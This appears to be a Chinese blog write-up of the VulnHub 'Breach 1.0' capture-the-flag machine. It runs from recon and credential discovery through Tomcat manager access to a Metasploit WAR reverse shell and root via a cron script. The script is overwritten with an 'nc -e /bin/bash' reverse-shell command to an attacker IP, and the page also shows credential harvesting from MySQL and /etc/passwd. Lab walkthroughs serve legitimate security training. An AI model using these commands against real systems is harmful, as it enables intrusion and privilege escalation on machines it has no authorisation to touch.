Vulnhub靶场Breach1.0详解

目录

一、靶机信息

二、环境配置

三、开始渗透

1.信息收集

2.web渗透 

2.1base解码

2.2登录到impresscms

 2.3 利用java环境导出keystore证书

2. 4Wireshark分析HTTP

2.5 BP代理绕过拦截网站

3.提权

3.1MSF反弹shell

3.2查看基本信息 

3.3漏洞查找(指纹识别)

3.4登录mysql

 3.5  MD5解密碰撞milton用户密码

 3.6 利用隐写破解blumbergh用户密码

 3.8 获取最终flag

四、总结


一、靶机信息

靶机地址

Breach: 1 ~ VulnHub

 

二、环境配置

win10物理机需要安装 BP Wireshark

Kali 双网卡 NAT 192.168.184.xxx(关闭也可以,我不想删所以留着)  仅主机:192.168.110.xx

其实单网卡也可以(一定是仅主机)。

Breach靶机 仅主机 192.168.110.140

Ping验证一下

win10物理机ping192.168.110.140 

kali ping 192.168.110.140

kali ping 192.168.184.135 是ping不通的,仅主机模式不在同一网段是ping不通的。

 

Breach 1.0靶场是配置的静态ip 192.168.110.140 

三、开始渗透

1.信息收集

主机发现 不用做了 靶机192.168.110.140

端口扫描

nmap -T4 -A -v 192.168.110.140 

扫描发现全部端口都开放了,显然是配置了端口防护,只能手动检测了。

优先80端口

查看翻译大概是小胖不满公司,离职时送的礼物,可真刑啊 !小胖 ! 

 习惯性的F12查看源码

 发现一串乱码,应该是什么加密。

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

 点击小胖图片,跳转到这。

Home page 主页 又返回过到小胖了 

 Cake 蛋糕 这张图只有小胖没有蛋糕吃。

 Stapler 订书机

Employee portal 员工门户,相当于我们的OA系统,差不多。 

使用CMS界面。

2.web渗透 

2.1base解码

先从64位的乱码开始吧。。。 

Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo
发现64位  应该是base64
MD5:32位 内容:0-9 A-F

 base解码,网站也是可以的。

 尝试在解码一次

 得到   pgibbons:damnitfeel$goodtobeagang$ta 

尝试登录一下 成功登录!!!

2.2登录到impresscms

submit 提示保存一下 发现 

目录泄露,但没什么有用的东西。

 点开邮件未读,3个

翻译一下吧 

第一个没什么利用价值。

第二个是IDS/IPS 入侵检测/防御系统

  

好像只有第三封邮件有用

访问192.168.110.140/.keystore,得到一个下载文件。

 

 百度了一下keystore,暂时没有办法。

keystore可以认为是存放秘钥的一个包,需要提供正确的密码才能将包里的秘钥取出来。 

SSL证书也可以被存放在keystore中,需要找到密码才能得到SSL证书。

SSL加密HTTP协议(HTTPS),进行身份认证和数据加解密,没有正确的SSL证书就无法破解http数据包的内容。

 home家 里面发现内容SSL可点击

 出来一个http连接,点击自动下载,密钥和密码都为 tomcat

百度一下pcap文件用什么打开,发现用Wireshark 抓包的。 

 2.3 利用java环境导出keystore证书

 win下需要java环境,如果没有,直接上kali就行(步骤是一样的)

(win利用java自带的keytool工具导出keystore,该工具在jdk的bin目录下)

keytool -list -keystore keystore  #查看keystore密钥里面所有的证书

密钥和密码都为 tomcat 

 导出证书

keytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcat

-importkeystore 导出keystore

-srckeystore  源keystore文件

-destkeystore  导出之后的证书存放路径

-deststoretype  导出keystore之后的证书类型

-srcalias 源alias

密码口令 tomcat 

成功导出,kiss.p12是因为我改名字了, 如果是tomcatkeystore.p12担心Wireshark识别不了。

2. 4Wireshark分析HTTP

点击编辑-->首选项-->Protocols-->SSL/TLS(如果没有SSL(旧版)就选TLS(新版本))-->Edit 

 在次打开_SSL_test_phase1.pcap,http数据包已经出来。

 Frame:物理层的数据帧概况。
Ethernet II:数据链路层以太网帧头部信息。
Internet Protocol Version 4:互联网层IP包头部信息。
Transmission Control Protocol:传输层的数据段头部信息,此处是TCP协议。
User Datagram Protocol:UDP协议
Hypertext Transfer Protocol:应用层的信息,此处是HTTP协议
Transport Layer Security  安全运输协议,SSL

查看HTTP数据包的情况

发现该tomcat是通过basic进行认证,在wireshark中自动解密tomcat:Tt\5D8F(#!*u=G)4m7zB

2.5 BP代理绕过拦截网站

 访问 https://192.168.110.140:8443/_M@nag3Me/html

发现打不开,可能是被浏览器的安全机制拦截证书了。

 利用BP代理(BP作为浏览器和服务器的一个中间件)

 BP开启监听代理,抓包,抓到、Forward放包。 

 接受风险并继续。

 抓包,放包,登录tomcat:Tt\5D8F(#!*u=G)4m7zB

 成功进入!!! 

 ps:说明一下,BP和浏览器设置均正常设置,但是抓包时却出现莫名端口,并且域名也未知。

原因在于burpsuite的user options里是否设置了上游系统代理,一般用于跟awvs、xray进行联动扫描。如果此处没有关闭,则下次抓包时就会出现无法抓包的情况。

查看一下后台,发现文件上传,但是有时间限制,上传大小马,蚁剑连接可能会掉,需要不断的上传连接。

 

 所以我们使用MSF反弹shell

3.提权

3.1MSF反弹shell

MSF生产tomcat.war木马

监听端口4444

上传木马

现在重点来了,动作一定要快,姿势一定要帅。

抓包,放包,主打的就是快 !!!

 反弹shell,连接成功。

3.2查看基本信息 

 

linux普通权限的用户怎么样提升到root权限???

收集信息 History  ls -a find sudo -l (显示当前用户可以用 sudo 执行那些命令)

sudo 提权 (切换用户)

内核漏洞(根据系统的版本漏洞)

SUID(程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件)

crontab(时刻表)

无法使用su命令,用python解决命令行

python -c 'import pty; pty.spawn("/bin/bash")'

查看用户cat /etc/passwd

3.3漏洞查找(指纹识别)

 搜索内核漏洞

searchsploit 14.04 Ubuntu

 好像没有现成的漏洞

指纹识别http://192.168.110.140/impresscms/

whatweb -v http://192.168.110.140/impresscms/  

 这个PHP的网站是用Apache部署的。

apache默认站点目录 /var/www/html

进入/var/www/html,查看到5446 和一个html文件

查看5446里的内容

回车,查看到mysql的账号为root,密码为空。

3.4登录mysql

查看表 

show tables

 

select user,password from user;   #查看user,password,表

 3.5  MD5解密碰撞milton用户密码

milton   6450d89bd3aff1d893b85d3ad65d2ec2

MDS 单向加密 不可逆 无法从密文解密到明文 
破解 强碰撞 

MD5免费在线解密破解_MD5在线加密-SOMD5

账号milton  密码thelaststraw

su blumbergh  切换到blumbergh用户,发现有密码。

 3.6 利用隐写破解blumbergh用户密码

进入/images

 

 隐写

直接上老大的图片

wget 下载到kali

strings 解密 bill.png

发现只有coffeestains是像密码一样

帐号blumbergh    密码coffeestains

发现 /usr/bin/tee   /tidyup.sh

Crontab 定时任务  + root 权限

用tee去修改 tidyup.sh 的内容,加入恶意命令

tidyup.sh每隔三分钟跑一次,tidyup.sh文件只有root可写,而能够以root权限运行tee命令。

3.7 利用tee去修改 tidyup.sh反弹获得root权限

echo "nc -e /bin/bash 192.168.110.130 5555" > shell.txt  #nc反弹命令

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh #使用tee命令将shell.txt内容输出到tidyup.sh

cat /usr/share/cleanup/tidyup.sh   #查看tidyup.sh文件是否写入成功

开启监听 nc -lvvp 5555,成功获得root权限!!!

 3.8 获取最终flag

cp /root/flair.jpg /var/www/html/images   #复制flair.ipg到/images目录下

打开/images,发现文件flair.jpg

 访问得到flag

四、总结

这个靶场真是综合性挺强的,各种坑。。。

伟大得老马曾说过:“ 道路是曲折的,前途是光明的 ”

学网安之后

“ 道路曲折我走不完,前途光明我看不见 ”

哈哈哈,总结一下

1.官方设定靶机192.168.110.140,端口扫描应该是做了防护。

2.从80端口入手,F12查看源码发现base64编码

<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

base64 两次解密 得到 pgibbons:damnitfeelta 登录到impresscms

3.目录泄露,发现邮件信息,下载keystore,利用java环境(kali自带jdk)导出SSL证书,证书导入

wireshark中解密HTTP数据包,自动解密tomcat:Tt\5D8F(#!*u=G)4m7zB 访问https://192.168.110.140:8443/_M@nag3Me/html

BP开启代理绕过安全拦截,上传MSF反弹.war木马,查看所有用户,可疑用户milton和blumbergh通过查看apache默认目录/var/www/获得mysql(root权限)的账号密码(空)

4.登入mysql,通过查看表得到milton的MD5 6450d89bd3aff1d893b85d3ad65d2ec2 解密得到

账号milton  密码thelaststraw

5.登录milton用户,查看内核漏洞,没有可利用的,history历史命令查看到sudo blumbergh

6./images目录下图片隐写技术得到blumbergh的密码coffeestains,登录到blumbergh用户下,

sudo-l查看到tee  tidyup.sh利用tee去修改 tidyup.sh反弹获得root权限,查看到flair.jpg,复制flair.ipg到/images目录下,访问其/images,得到flag图片。

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值